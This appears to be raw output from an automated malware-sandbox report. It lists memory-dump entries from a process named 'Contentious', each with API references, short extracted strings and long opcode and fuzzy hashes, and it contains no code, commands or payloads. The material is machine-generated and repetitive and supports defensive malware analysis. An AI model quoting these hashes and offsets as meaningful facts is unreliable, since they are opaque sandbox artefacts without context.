                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942973811.0000000020510000.00000040.00000800.00020000.00000000.sdmp, Offset: 20510000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20510000_Contentious.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 5fbad8c7066ab3bcf7ed5082c5d1edec63814b67692855f9d05ebd8a5d8b2cbf
                                            • Instruction ID: 8407516cbef5f3863c444d009a81ff9f98e1af9be937ee534ef79320079ad63f
                                            • Opcode Fuzzy Hash: 5fbad8c7066ab3bcf7ed5082c5d1edec63814b67692855f9d05ebd8a5d8b2cbf
                                            • Instruction Fuzzy Hash: 324149B5900309CFDB14CF99C488A9AFBF5FB88310F24C959D518AB361D778A981CFA0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2042523F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942494015.0000000020420000.00000040.00000800.00020000.00000000.sdmp, Offset: 20420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20420000_Contentious.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: c547ff997434e453ea314aac9bd8c8cb1862fe5a5195050159732d9200018098
                                            • Instruction ID: 79852c252758e6cf30e1a486fb406f3c31ce177909755888186b18bb3e290342
                                            • Opcode Fuzzy Hash: c547ff997434e453ea314aac9bd8c8cb1862fe5a5195050159732d9200018098
                                            • Instruction Fuzzy Hash: 1F21D2B5D002499FDB10CFA9D984AEEFBF5EB48320F14845AE958A3350C378A950DFA1
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2042523F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942494015.0000000020420000.00000040.00000800.00020000.00000000.sdmp, Offset: 20420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20420000_Contentious.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: ad6dc38da9920b635a113b30a1c31653f39cfa68a1bdf81ea557be1fcba921a4
                                            • Instruction ID: 86d77a72a7b882d4f029749e37f5a8ae97110743b6256f50a0bc216cf8b27ebd
                                            • Opcode Fuzzy Hash: ad6dc38da9920b635a113b30a1c31653f39cfa68a1bdf81ea557be1fcba921a4
                                            • Instruction Fuzzy Hash: C521C4B59003489FDB10CF9AD984ADEFBF8EB48320F14845AE958A3350D378A954CFA5
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 2051488D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942973811.0000000020510000.00000040.00000800.00020000.00000000.sdmp, Offset: 20510000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20510000_Contentious.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 0286bc2ca8f84b9c18079791f3bbdfc33c1d2e2c9b2a2036a5fa4718142954f9
                                            • Instruction ID: 4006c00ec2ab2407654f6680ee580bf0a6a3264c75cf432f6159cf3136c28604
                                            • Opcode Fuzzy Hash: 0286bc2ca8f84b9c18079791f3bbdfc33c1d2e2c9b2a2036a5fa4718142954f9
                                            • Instruction Fuzzy Hash: 581133B68003488FDB10CF99D485BDEFFF4EB48320F20855AD559A3201C3B4A984CFA0
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 2051488D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942973811.0000000020510000.00000040.00000800.00020000.00000000.sdmp, Offset: 20510000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20510000_Contentious.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 29d8d5ed009cc92284b3aed04c086e9d60553e0672564844851fce76723d7610
                                            • Instruction ID: 738664eb28a967ca888b8ae3e2f959b01ab43d574b6846ac1ecd85c9237f98a9
                                            • Opcode Fuzzy Hash: 29d8d5ed009cc92284b3aed04c086e9d60553e0672564844851fce76723d7610
                                            • Instruction Fuzzy Hash: 651115B19003499FDB20DF9AD885B9EFFF4EB48320F208459D518A7300C374A984CFA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: cf04d7877be7e2ef56f893c7c2261f829f4ad4c76d49c08c19141086e3dd746c
                                            • Instruction ID: bfe2e6b24720cc24f3184bfc8d6cd85ee9501d2e2f5c833ce931d43243d315c0
                                            • Opcode Fuzzy Hash: cf04d7877be7e2ef56f893c7c2261f829f4ad4c76d49c08c19141086e3dd746c
                                            • Instruction Fuzzy Hash: 06618175E00218CFDB54DFA9C890A9DBBB2FF88301F20816AD819AB355DB346986CF40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q
                                            • API String ID: 0-74704288
                                            • Opcode ID: 0b560e5570766feb49bd2eb8963b42425b3be853f456e2e8ff38582324f96e41
                                            • Instruction ID: 59d36eedcf58dea45f23d931b85be74c2e7f3b997a29162288f589c9ad9f0cff
                                            • Opcode Fuzzy Hash: 0b560e5570766feb49bd2eb8963b42425b3be853f456e2e8ff38582324f96e41
                                            • Instruction Fuzzy Hash: 4641D0357002448FCB159B78D8546AE7BF2BFC8311F644269E91ADB7A1CF318D46CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hbq
                                            • API String ID: 0-1245868
                                            • Opcode ID: a8b48dabcf349699d2dc573c9f93493cafbb8d6a6b8e7c2cc6032a62451fa48a
                                            • Instruction ID: bce2ff834bb271e621c1b2fe2c58139ee272fb5879092daa1da7ec99653fd2a0
                                            • Opcode Fuzzy Hash: a8b48dabcf349699d2dc573c9f93493cafbb8d6a6b8e7c2cc6032a62451fa48a
                                            • Instruction Fuzzy Hash: 95412271B052448FCB05EBB88850AAE7FF6EFC9300B2041BDE209DB256DA348D06CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hbq
                                            • API String ID: 0-1245868
                                            • Opcode ID: 8d9cd748bbfe9bd1c2b8c17200d8a48f4db699175e573d6a4fd882aba5f8b6fd
                                            • Instruction ID: b052b4c8247c132901a9eb441c6ef4bc6f63e1ba5ee6731490df69fad91ba008
                                            • Opcode Fuzzy Hash: 8d9cd748bbfe9bd1c2b8c17200d8a48f4db699175e573d6a4fd882aba5f8b6fd
                                            • Instruction Fuzzy Hash: DC31F5346042449FCB059FB8C460A9E7FB2FFC6310B2481AAD50ACB2A6DE394D4BCB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: T
                                            • API String ID: 0-2145084337
                                            • Opcode ID: 948e8aebe8cfd96990415ecb7756f213ab026a9970e3e37dc22ffc0eaf6ef7f9
                                            • Instruction ID: 10c1a007c1a757b789debc3e7d1125272a4d9498067b4960797d081ecb76e5cb
                                            • Opcode Fuzzy Hash: 948e8aebe8cfd96990415ecb7756f213ab026a9970e3e37dc22ffc0eaf6ef7f9
                                            • Instruction Fuzzy Hash: 0021C274C052498FCB01EFB8D8455EDBFF1BF4A301F10516AD809B7260EB345A99CBA1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 438172829de63e318b03d81134eaaf5718fcca313e5eac4076d0a2447076baf5
                                            • Instruction ID: 1e9186baae1e0da9781b48f52cadeb6791d4ca2499c717e04d861b257822fada
                                            • Opcode Fuzzy Hash: 438172829de63e318b03d81134eaaf5718fcca313e5eac4076d0a2447076baf5
                                            • Instruction Fuzzy Hash: F7F13F75A40114CFCB04CF6CC8949ADBBF6FF88312B5A8159E925AB361CB35EC85CB91
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db45f59650919c95d0134ae10b8f50183840b0ff90e641431c173104b92ba716
                                            • Instruction ID: 97d860ec6b0e994a277042c16b9ba2ead9f3aa9eaa2b1a35f8b6c86dee97d6fd
                                            • Opcode Fuzzy Hash: db45f59650919c95d0134ae10b8f50183840b0ff90e641431c173104b92ba716
                                            • Instruction Fuzzy Hash: D5711734718605CFDB15DF28E899AA97BE6AF49702F1500A9E826CF3B1DB70DC45CB90
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4f08b1745195a19c343bd9f2f41eca4befaaa16b6cc17145fcaa303556f536e
                                            • Instruction ID: c7394218dab0a6a51705c8371069ea21aaa0842cd560ead79658b08861fb77b9
                                            • Opcode Fuzzy Hash: b4f08b1745195a19c343bd9f2f41eca4befaaa16b6cc17145fcaa303556f536e
                                            • Instruction Fuzzy Hash: DD510FB2B046019FC3048BB9DC949ABBBF9FBC9320B14866EE569C7791D631DC05C760
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e51f4c14455d0a15c0ee7441a9f694ae1f5d2f5e158c8d567ad111145c7d4cf2
                                            • Instruction ID: ced8ea811b951e292742631370732bb63ac3d15dc57e7d60ab9b946e766d00d2
                                            • Opcode Fuzzy Hash: e51f4c14455d0a15c0ee7441a9f694ae1f5d2f5e158c8d567ad111145c7d4cf2
                                            • Instruction Fuzzy Hash: DA51ADB0025A4A9FE2002B20FDAC16A7BB1FF4F7277456D44B00FA58729F7855C9CB22
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a2f97bce1a36edb681d00e8ad3dcb45db02e5ecf2ce92c4674172642071811b
                                            • Instruction ID: 9e32c981272b895c42c62eab9a5b756c814de1fe2b58fba6076777fe12c55913
                                            • Opcode Fuzzy Hash: 9a2f97bce1a36edb681d00e8ad3dcb45db02e5ecf2ce92c4674172642071811b
                                            • Instruction Fuzzy Hash: 82518EB0025B4B9FE2002B20FDAC12ABBB5FF4F7277456D44B10FA58659F7854C58A62
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fec817017880c0081cb8287fcea40b27968d628bc9d495ecd2baf85cbbc0fc91
                                            • Instruction ID: e0b4a2eb574d7e83d460f750a4843e837f2a272fbc7f5e09841848b20dfc2390
                                            • Opcode Fuzzy Hash: fec817017880c0081cb8287fcea40b27968d628bc9d495ecd2baf85cbbc0fc91
                                            • Instruction Fuzzy Hash: F1611274D01218DFDB15DFA4D954BADBBB2FF88306F208129D809AB394DB346A86CF41
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 304b66655ecb039dd1205f3ec3802942b78f730c812976b08a378fe7aa19a000
                                            • Instruction ID: f044a82d51567ae506503ebe8022adcc3f5ff4439fb50128b1b7405fec05c2a8
                                            • Opcode Fuzzy Hash: 304b66655ecb039dd1205f3ec3802942b78f730c812976b08a378fe7aa19a000
                                            • Instruction Fuzzy Hash: 7C518274E012089FDB44DFA9D9949DDBBF2BF89300F249169E819AB365DB30A905CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93895a614e7cb355bdd36038c0bbbb62d79595a9556e4c37cc72923dca0bf02c
                                            • Instruction ID: 554de42a600454ccdcf5a8818d8340fe2ed0aeb8f442977a9616ab275c230d00
                                            • Opcode Fuzzy Hash: 93895a614e7cb355bdd36038c0bbbb62d79595a9556e4c37cc72923dca0bf02c
                                            • Instruction Fuzzy Hash: A551B475E01208CFCB09DFA9D49499DBBF2FF89311B209069E819AB324DB35AD46CF40
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8dd34e38c4694dfd41ec3f138d5c85834c53955a06803b6e8b71120d77e0fc51
                                            • Instruction ID: 05bfb6c9a571df5526f39333e6d9a3fdcdb6d419f0191f70a1f2237b94c9d711
                                            • Opcode Fuzzy Hash: 8dd34e38c4694dfd41ec3f138d5c85834c53955a06803b6e8b71120d77e0fc51
                                            • Instruction Fuzzy Hash: 6951AE31A04289DFCF15CFA4D844A9EBFB2AF49311F148196EC659F2A1D334D958CBA2
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 995a98a2cb7e332ae51f63e1f20177399941fab79e567425fdbd28a46b12251d
                                            • Instruction ID: 6e5912fd9f4a2371edf489826049be88979552f35a0d736a9dcb796f0e48da1a
                                            • Opcode Fuzzy Hash: 995a98a2cb7e332ae51f63e1f20177399941fab79e567425fdbd28a46b12251d
                                            • Instruction Fuzzy Hash: 2E316F31604109EFCF059F64D855AAE3BB6FF88305F108424FD298B291CB38DDA5DBA1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e8121f3bc0f74022b82c1644cdf22952d19f62c1dbebf1732c8d04563f69324
                                            • Instruction ID: fb364dd59ab84d8be67b353561b7989c40b8d9db06d69987757eb2b44a673253
                                            • Opcode Fuzzy Hash: 3e8121f3bc0f74022b82c1644cdf22952d19f62c1dbebf1732c8d04563f69324
                                            • Instruction Fuzzy Hash: 0F21D3353082018FDB151735BC99A393AA79FC971A71840B9D919CF7D5EF24CC8A93C1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f599d6c4e1a3a3cbf0eaf134e5269f4f304d507348405173504f12ae44c05f6c
                                            • Instruction ID: aec0f3b47db49ac4329b4bcc2df8e949179df43686a25cdaa52c9243cf96f53b
                                            • Opcode Fuzzy Hash: f599d6c4e1a3a3cbf0eaf134e5269f4f304d507348405173504f12ae44c05f6c
                                            • Instruction Fuzzy Hash: 7F31B070A402198FCB04CF69C8849AEBBF2BF89315B158259E9259B3B1CB349D46CB91
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8233705335340c9c9e62822e874e6acde37368e13a9b81776dc118d0cb500eef
                                            • Instruction ID: f1051db1d36e4a89e18c7b1747ca63b4797ae3566e2b724c8617768c9ac561e1
                                            • Opcode Fuzzy Hash: 8233705335340c9c9e62822e874e6acde37368e13a9b81776dc118d0cb500eef
                                            • Instruction Fuzzy Hash: 7B21A4353082008BEB141625F859A7A369B9FC871AF1440B4D91ACF7D4EF65CC8693C1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f7954a74cfbe2fdf6ff85c3a9764d3063f3ac131de06f884c7b0800c01b59abc
                                            • Instruction ID: d9ec35818e232471d44ace54259f56a7dc362595f9f12493c0803ea0a56a7946
                                            • Opcode Fuzzy Hash: f7954a74cfbe2fdf6ff85c3a9764d3063f3ac131de06f884c7b0800c01b59abc
                                            • Instruction Fuzzy Hash: 9621D034301911DFC7198B28C8A452EB7A3AFC5722B154268EC1ADF350CF20DC068BC0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c4cd25f36f58b6f244d169a97d8630c5aed1914cd1d6ac77f464aa349b9e5bd
                                            • Instruction ID: a828fd8c97ef58c226ad4f649fe67825ef0f47b99feda43090a0e26bb6662d75
                                            • Opcode Fuzzy Hash: 3c4cd25f36f58b6f244d169a97d8630c5aed1914cd1d6ac77f464aa349b9e5bd
                                            • Instruction Fuzzy Hash: 0721B272A00115DFCB14DF74C4509AE77A5EB9A364B10C01DE85A9B280DB39EE46CBE2
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2922646528.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_ad000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19c19e50b2e1ba2f01f8cc4e8727302870f604b73c297ae510d21d4728c546d4
                                            • Instruction ID: ef9fd44ab4bac6aec4dc9670c78a6ce76559cff663cb862fdbbce94d4814cbbe
                                            • Opcode Fuzzy Hash: 19c19e50b2e1ba2f01f8cc4e8727302870f604b73c297ae510d21d4728c546d4
                                            • Instruction Fuzzy Hash: 44212575604204AFCB10CF54C9C4F26BBA5FB95314F24CA6EE94A4B741C73AD846CA61
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5bed8e755979b88d0b115b77e86ed9795db724ae84055f3d22fb0608edbc78fb
                                            • Instruction ID: e634557de78974ebf07a94e20bcd9dc17a68b2be8525a874a58073d77acf5985
                                            • Opcode Fuzzy Hash: 5bed8e755979b88d0b115b77e86ed9795db724ae84055f3d22fb0608edbc78fb
                                            • Instruction Fuzzy Hash: 4B115272E05359DFCB029BB89C104DEBB30FF863217258397E526BB091EA35190AC7D1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 493c223755346794dfd774069d7a2a5dc1c83b73fb31d64e3cc30e117d9a2fd0
                                            • Instruction ID: 0e023a4fdebafb180385eb1c0cc02ea63b2802f79be3181b06ed3cf74ba95df7
                                            • Opcode Fuzzy Hash: 493c223755346794dfd774069d7a2a5dc1c83b73fb31d64e3cc30e117d9a2fd0
                                            • Instruction Fuzzy Hash: 3C31C278E01308CFCB08DFA8D59499DBBB2FF49316B20406AE819AB320D735AD45CF40
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af76e5d95d455d7eb041d80a5fdb850afbbe15fbbb3537ac2d7de2238296ef30
                                            • Instruction ID: 38957336a54a49b02778488f5f5516e958bbcddf9d7248d6e47d49d793ff2716
                                            • Opcode Fuzzy Hash: af76e5d95d455d7eb041d80a5fdb850afbbe15fbbb3537ac2d7de2238296ef30
                                            • Instruction Fuzzy Hash: CC21B431604109DFCB159F64D455B6B3BB2FB8431AF108024F9198F291CB38DD95DBE0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44bbc5861e4529ee20d16d9364bbb3c4699959e289b9b11e8b8e65800d5b3a81
                                            • Instruction ID: cc9d345b00185210cc4ebb01655692fb98f3e59ea8a95feb8b0129a301e0ce0b
                                            • Opcode Fuzzy Hash: 44bbc5861e4529ee20d16d9364bbb3c4699959e289b9b11e8b8e65800d5b3a81
                                            • Instruction Fuzzy Hash: F5119D767002048FC715DBA9D594E56B7E2FF88721F11846EE61ACB365CB72DC45CB10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c3d19c4310382ab7ca104dde135327593e2800f28e171a3b8fc295df9f43a0e0
                                            • Instruction ID: 07dfc7896d140a87c4434ce7ed0c8dc9da6af47a34b15c3c86c38f77cd177b8d
                                            • Opcode Fuzzy Hash: c3d19c4310382ab7ca104dde135327593e2800f28e171a3b8fc295df9f43a0e0
                                            • Instruction Fuzzy Hash: C0214970904219DFDB06DFB8C98169EBFF1FB85301F0085AAD0589B265EB781A4ACF91
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37966dff82e0add6db5f82b5704d64a49ef864832e578daf50e8a76cc5008912
                                            • Instruction ID: 916973327afef298f011981e089fc03f5de7bbd566e34e8b8d266ac32d3b9ba6
                                            • Opcode Fuzzy Hash: 37966dff82e0add6db5f82b5704d64a49ef864832e578daf50e8a76cc5008912
                                            • Instruction Fuzzy Hash: E2116DB4E011198FDB04DBE8D884EADBBF5BB88305F20D269E804AB342D731ED41CB50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51407afe462208e43b7cf64c84e452bc98057738ac90bd5da95fc8770b34d709
                                            • Instruction ID: 0a1581ff1763ce3604fd073a93329b6448339fb4eb237e2ae736197cc0294c53
                                            • Opcode Fuzzy Hash: 51407afe462208e43b7cf64c84e452bc98057738ac90bd5da95fc8770b34d709
                                            • Instruction Fuzzy Hash: 84118231701A12DFC7195B29C8A852E77A7AFC57627154168ED1ACF750DF20DC4687D0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 360014fefdb57ab50c62aeacd5fc4f19a101a5ce15fa69bb136f5e0adf02f412
                                            • Instruction ID: a29f302fa89054f12a09deeefd89d3185b824746fb5b9587228fe342c50e9f6a
                                            • Opcode Fuzzy Hash: 360014fefdb57ab50c62aeacd5fc4f19a101a5ce15fa69bb136f5e0adf02f412
                                            • Instruction Fuzzy Hash: 9F11C2B2E002158BCB50EFFAC88459EBBF2AF88211B544539D418E7308EB31DC42CBA1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1187c5886fca4b671f78022e0cfb840ef36ffdb3b2d4c0f6bc1efc720cafcdc1
                                            • Instruction ID: c2ae9b02e8e112a99731733c0fae814166052ee808bab7154fae681ff079a70e
                                            • Opcode Fuzzy Hash: 1187c5886fca4b671f78022e0cfb840ef36ffdb3b2d4c0f6bc1efc720cafcdc1
                                            • Instruction Fuzzy Hash: 38113A70D00219DFDB04EFB8C9816AEBBF2FB84302F0085A9D0189B315EB745A45CF81
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2922646528.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_ad000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f917b708bda7e5fdbfd4ba76e3cc8b275685cae915d7c58425fa312f621bd797
                                            • Instruction ID: f0a16de95d160650f56d0790bc002627d5218908454bc4dade64d3814d2014c6
                                            • Opcode Fuzzy Hash: f917b708bda7e5fdbfd4ba76e3cc8b275685cae915d7c58425fa312f621bd797
                                            • Instruction Fuzzy Hash: 7511D075504244DFCB11CF50C5C4B15BBA2FB45314F24C6AED84A4B652C33AD84ACF51
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
